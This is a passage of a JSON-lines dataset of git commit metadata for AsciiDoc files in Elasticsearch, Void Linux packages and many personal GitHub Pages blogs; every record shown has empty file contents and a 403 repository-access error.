docs\n","repos":"scottsom\/elasticsearch,yanjunh\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,Helen-Zhao\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,nazarewk\/elasticsearch,jimczi\/elasticsearch,wuranbo\/elasticsearch,JSCooke\/elasticsearch,i-am-Nathan\/elasticsearch,MaineC\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,robin13\/elasticsearch,spiegela\/elasticsearch,MisterAndersen\/elasticsearch,alexshadow007\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,geidies\/elasticsearch,kalimatas\/elasticsearch,MaineC\/elasticsearch,gfyoung\/elasticsearch,geidies\/elasticsearch,MisterAndersen\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,JackyMai\/elasticsearch,fernandozhu\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,elasticdog\/elasticsearch,LewayneNaidoo\/elasticsearch,winstonewert\/elasticsearch,fforbeck\/elasticsearch,fred84\/elasticsearch,jprante\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,fernandozhu\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,bawse\/elasticsearch,mikemccand\/elasticsearch,pozhidaevak\/elasticsearch,i-am-Nathan\/elasticsearch,rlugojr\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,fernandozhu\/elasticsearch,mikemccand\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,i-am-Nathan\/elasticsearch,a2lin\/elasticsearch,rlugojr\/elasticsearch,mikemccand\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,njlawton\/elasticsearch,rlugojr\/elasticsearch,mikemccand\/elasticsearch,henakamaMSFT\/elasticsearch,MaineC\/elasticsearch,pozhidaevak\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nezirus\/elasticsearch,shreejay\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,geidies\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,MaineC\/elasticsearch,strapdata\/elassandra,geidies\/elasticsearch,scorpionvicky\/elasticsearch,alexshadow007\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,ZTE-PaaS\/elasticsearch,fred84\/elasticsearch,JackyMai\/elasticsearch,StefanGor\/elasticsearch,sneivandt\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,i-am-Nathan\/elasticsearch,StefanGor\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,elasticdog\/elasticsearch,bawse\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,kalimatas\/elasticsearch,spiegela\/elasticsearch,fforbeck\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,brandonkearby\/elasticsearch,jprante\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,yanjunh\/elasticsearch,markwalkom\/elasticsearch,artnowo\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,nknize\/elasticsearch,yanjunh\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,spiegela\/elasticsearch,StefanGor\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,umeshdangat\/elasticsearch,obourgain\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,JackyMai\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,MisterAndersen\/elasticsearch,lks21c\/elasticsearch,vroyer\/elassandra,Helen-Zhao\/elasticsearch,naveenhooda2000\/elasticsearch,C-Bish\/elasticsearch,mortonsykes\/elasticsearch,kalimatas\/elasticsearch,JackyMai\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,nazarewk\/elasticsearch,LewayneNaidoo\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,henakamaMSFT\/elasticsearch,uschindler\/elasticsearch,artnowo\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,obourgain\/elasticsearch,lks21c\/elasticsearch,nilabhsagar\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,yanjunh\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,fernandozhu\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elasticassandra,glefloch\/elasticsearch,nezirus\/elasticsearch,MaineC\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elasticassandra,C-Bish\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,spiegela\/elasticsearch,shreejay\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,winstonewert\/elasticsearch,wuranbo\/elasticsearch,sneivandt\/elasticsearch,JSCooke\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,wuranbo\/elasticsearch,mohit\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,a2lin\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,wenpos\/elasticsearch,njlawton\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,winstonewert\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,glefloch\/elasticsearch,IanvsPoplicola\/elasticsearch,geidies\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,Shepard1212\/elasticsearch,fforbeck\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,mortonsykes\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,Helen-Zhao\/elasticsearch,HonzaKral\/elasticsearch,mortonsykes\/elasticsearch,nezirus\/elasticsearch,nazarewk\/elasticsearch,geidies\/elasticsearch,rajanm\/elasticsearch,shreejay\/elasticsearch,artnowo\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,Helen-Zhao\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,alexshadow007\/elasticsearch,nilabhsagar\/elasticsearch,s1monw\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,winstonewert\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,JackyMai\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,mortonsykes\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch","old_file":"docs\/reference\/modules\/scripting\/native.asciidoc","new_file":"docs\/reference\/modules\/scripting\/native.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01949addedf81819180c8abae06ddd978bf7dfa7","subject":"Update 2015-05-28-This-is-a-test.adoc","message":"Update 2015-05-28-This-is-a-test.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-05-28-This-is-a-test.adoc","new_file":"_posts\/2015-05-28-This-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"832abafc998b2260281600e537b5889882ba0f8f","subject":"Update 2015-09-22-indian_lol_tvc.adoc","message":"Update 2015-09-22-indian_lol_tvc.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-22-indian_lol_tvc.adoc","new_file":"_posts\/2015-09-22-indian_lol_tvc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a1f678f449480d08f15433e33a49afd9bde21ad","subject":"Update 2015-04-29-V01-greater-avancement.adoc","message":"Update 2015-04-29-V01-greater-avancement.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-04-29-V01-greater-avancement.adoc","new_file":"_posts\/2015-04-29-V01-greater-avancement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5198ebc63bec4dec14583fc68102eb99586e6adf","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b776e6fde31ea42b33338b6143d561d7f09d3e00","subject":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","message":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d456d63889534fc55c97aad170439df0d47a2d69","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf5bf5854cf87d0780a250e1959f5c29d39bec70","subject":"Create do-accessible-fil.adoc","message":"Create do-accessible-fil.adoc\n\nFilipino translation for do-accessible.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"do-accessible-fil.adoc","new_file":"do-accessible-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4152f8eb4d4c6d7bfe05dd4a3649f7f570d31c3e","subject":"update ConnectX-4 information","message":"update ConnectX-4 information\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3d05e804056c718db1b596106d2d60fa618e4e2","subject":"DBZ 1.5.0.Beta1 release announcement","message":"DBZ 1.5.0.Beta1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-02-24-debezium-1-5-beta1-released.adoc","new_file":"_posts\/2021-02-24-debezium-1-5-beta1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27e98f253029ab4aad7aab07d56fcc11d4f52f83","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce87aba0efb4dcd6e9e90bd1ca434e398eaf614a","subject":"Update 2017-02-13.adoc","message":"Update 2017-02-13.adoc","repos":"osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io","old_file":"_posts\/2017-02-13.adoc","new_file":"_posts\/2017-02-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/osada9000\/osada9000.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e03e5ab3ba0b33bc4de4826a00ca1931b429056","subject":"Update 2015-07-13-Liebe.adoc","message":"Update 2015-07-13-Liebe.adoc","repos":"havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io","old_file":"_posts\/2015-07-13-Liebe.adoc","new_file":"_posts\/2015-07-13-Liebe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/havvazaman\/havvazaman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41bdc27bc5cbad6b61c19278a52f6e1d4d700e37","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2175adf145fee406be1a9d9d62e3e20dbc5c334","subject":"[SPARK] document type conversion and push down","message":"[SPARK] document type conversion and push down\n","repos":"huangll\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d2d424ed6a3f6c61f16d426bcef2ec31eebd84c","subject":"y2b create post The iPhone Torture Chamber","message":"y2b create post The iPhone Torture Chamber","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-03-The-iPhone-Torture-Chamber.adoc","new_file":"_posts\/2017-02-03-The-iPhone-Torture-Chamber.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0238fa78810e8f6e4b3b82c41b673b056463a817","subject":"Update 2016-03-30-Las-matematicas-es-mi-amiga.adoc","message":"Update 2016-03-30-Las-matematicas-es-mi-amiga.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-es-mi-amiga.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-es-mi-amiga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a51b8273636c0a70895e823c938ab9ff5ad667e1","subject":"Update 2017-06-13-neural_network_from_scratch.adoc","message":"Update 2017-06-13-neural_network_from_scratch.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-13-neural_network_from_scratch.adoc","new_file":"_posts\/2017-06-13-neural_network_from_scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5547181c3171f9aad88a87a33be4fc024156d576","subject":"Update 2017-10-27-Episode-116-Tell-Me-A-Story.adoc","message":"Update 2017-10-27-Episode-116-Tell-Me-A-Story.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-10-27-Episode-116-Tell-Me-A-Story.adoc","new_file":"_posts\/2017-10-27-Episode-116-Tell-Me-A-Story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4af63807a83d299e60a6416bad7d269f4503c2b5","subject":"Update 2016-03-10-Install-Sentry-with-Docker.adoc","message":"Update 2016-03-10-Install-Sentry-with-Docker.adoc","repos":"natsu90\/hubpress.io,natsu90\/hubpress.io,natsu90\/hubpress.io","old_file":"_posts\/2016-03-10-Install-Sentry-with-Docker.adoc","new_file":"_posts\/2016-03-10-Install-Sentry-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/natsu90\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94d8ae70e2baa0b2cae95e85f5f3eb39c320010a","subject":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","message":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b524ef2902fef99062747b89e98ced692f72f68","subject":"Captain's Log FAQ","message":"Captain's Log FAQ\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3590c48054b05b7dd3dff2a12ba48e1fdf389da4","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"611a43d95233985fefae0dfdb14db0c390c6d05a","subject":"Update 2017-04-19-part-1.adoc","message":"Update 2017-04-19-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-04-19-part-1.adoc","new_file":"_posts\/2017-04-19-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4e156bf2792dea4b89a9e69032d43bbdcdb78be","subject":"manual: added the global functions section.","message":"manual: added the global functions section.\n","repos":"bougyman\/void-packages,allan\/void-packages,lodvaer\/void-packages,kylesusername\/void-packages,kokakolako\/void-packages,kylesusername\/void-packages,allan\/void-packages,k00mi\/void-packages,deathsyn\/void-packages,okapia\/void-packages,kylesusername\/void-packages,WKuipers\/void-packages,uriah0\/void-packages,Bubble-be\/void-packages,lodvaer\/void-packages,deathsyn\/void-packages,kulinacs\/void-packages,floGik\/void-packages,k00mi\/void-packages,liwakura\/void-packages,WKuipers\/void-packages,meowstars\/void-packages,eddyb\/void-packages,kulinacs\/void-packages,aisamanra\/void-packages,lodvaer\/void-packages,deathsyn\/void-packages,rfnash\/void-packages,opsaaspo\/void-packages,gangsterakato\/void-packages,jprjr\/void-packages,asafo\/void-packages,juliendehos\/void-packages,tjohann\/void-packages,meowstars\/void-packages,gangsterakato\/void-packages,radare\/void-packages,LockeAnarchist\/void-packages,radare\/void-packages,NeoChontrix\/void-packages,asafo\/void-packages,meowstars\/void-packages,esantoro\/void-packages,samuelchodur\/void-packages,NeoChontrix\/void-packages,WilliamO7\/void-packages,EaterOfCode\/void-packages,lodvaer\/void-packages,WKuipers\/void-packages,WKuipers\/void-packages,allan\/void-packages,aisamanra\/void-packages,opsaaspo\/void-packages,samuelchodur\/void-packages,tjohann\/void-packages,WilliamO7\/void-packages,deathsyn\/void-packages,bougyman\/void-packages,EaterOfCode\/void-packages,opsaaspo\/void-packages,coredumb\/void-packages,bougyman\/void-packages,bougyman\/void-packages,liwakura\/void-packages,jprjr\/void-packages,skrzyp\/void-packages,gangsterakato\/void-packages,Bubble-be\/void-packages,ayghor\/void-packages,EaterOfCode\/void-packages,kokakolako\/void-packages,necrophcodr\/void-packages,liwakura\/void-packages,rfnash\/void-packages,floGik\/void-packages,okapia\/void-packages,NeoChontrix\/void-packages,radare\/void-packages,lodvaer\/void-packages,ylixir\/void-packages,radare\/void-packages,necrophcodr\/void-packages,tjohann\/void-packages,asafo\/void-packages,juliendehos\/void-packages,kylesusername\/void-packages,ylixir\/void-packages,kokakolako\/void-packages,k00mi\/void-packages,asafo\/void-packages,kokakolako\/void-packages,lodvaer\/void-packages,coredumb\/void-packages,juliendehos\/void-packages,tjohann\/void-packages,jprjr\/void-packages,kokakolako\/void-packages,eddyb\/void-packages,liwakura\/void-packages,coredumb\/void-packages,aisamanra\/void-packages,liwakura\/void-packages,kulinacs\/void-packages,WKuipers\/void-packages,Bubble-be\/void-packages,allan\/void-packages,esantoro\/void-packages,samuelchodur\/void-packages,okapia\/void-packages,ylixir\/void-packages,NeoChontrix\/void-packages,floGik\/void-packages,LockeAnarchist\/void-packages,eddyb\/void-packages,juliendehos\/void-packages,ylixir\/void-packages,k00mi\/void-packages,aisamanra\/void-packages,skrzyp\/void-packages,gangsterakato\/void-packages,tjohann\/void-packages,esantoro\/void-packages,juliendehos\/void-packages,floGik\/void-packages,okapia\/void-packages,floGik\/void-packages,WilliamO7\/void-packages,necrophcodr\/void-packages,jprjr\/void-packages,NeoChontrix\/void-packages,meowstars\/void-packages,gangsterakato\/void-packages,Bubble-be\/void-packages,k00mi\/void-packages,ylixir\/void-packages,samuelchodur\/void-packages,ayghor\/void-packages,jprjr\/void-packages,rfnash\/void-packages,meowstars\/void-packages,bougyman\/void-packages,coredumb\/void-packages,uriah0\/void-packages,uriah0\/void-packages,opsaaspo\/void-packages,EaterOfCode\/void-packages,skrzyp\/void-packages,kylesusername\/void-packages,LockeAnarchist\/void-packages,uriah0\/void-packages,rfnash\/void-packages,LockeAnarchist\/void-packages,opsaaspo\/void-packages,aisamanra\/void-packages,juliendehos\/void-packages,necrophcodr\/void-packages,NeoChontrix\/void-packages,ayghor\/void-packages,jprjr\/void-packages,eddyb\/void-packages,k00mi\/void-packages,skrzyp\/void-packages,eddyb\/void-packages,ayghor\/void-packages,rfnash\/void-packages,asafo\/void-packages,deathsyn\/void-packages,kulinacs\/void-packages,ayghor\/void-packages,WKuipers\/void-packages,coredumb\/void-packages,EaterOfCode\/void-packages,allan\/void-packages,floGik\/void-packages,okapia\/void-packages,samuelchodur\/void-packages,radare\/void-packages,gangsterakato\/void-packages,ayghor\/void-packages,Bubble-be\/void-packages,esantoro\/void-packages,skrzyp\/void-packages,radare\/void-packages,coredumb\/void-packages,uriah0\/void-packages,necrophcodr\/void-packages,opsaaspo\/void-packages,WilliamO7\/void-packages,WilliamO7\/void-packages,esantoro\/void-packages,WilliamO7\/void-packages,liwakura\/void-packages,kulinacs\/void-packages,kulinacs\/void-packages,LockeA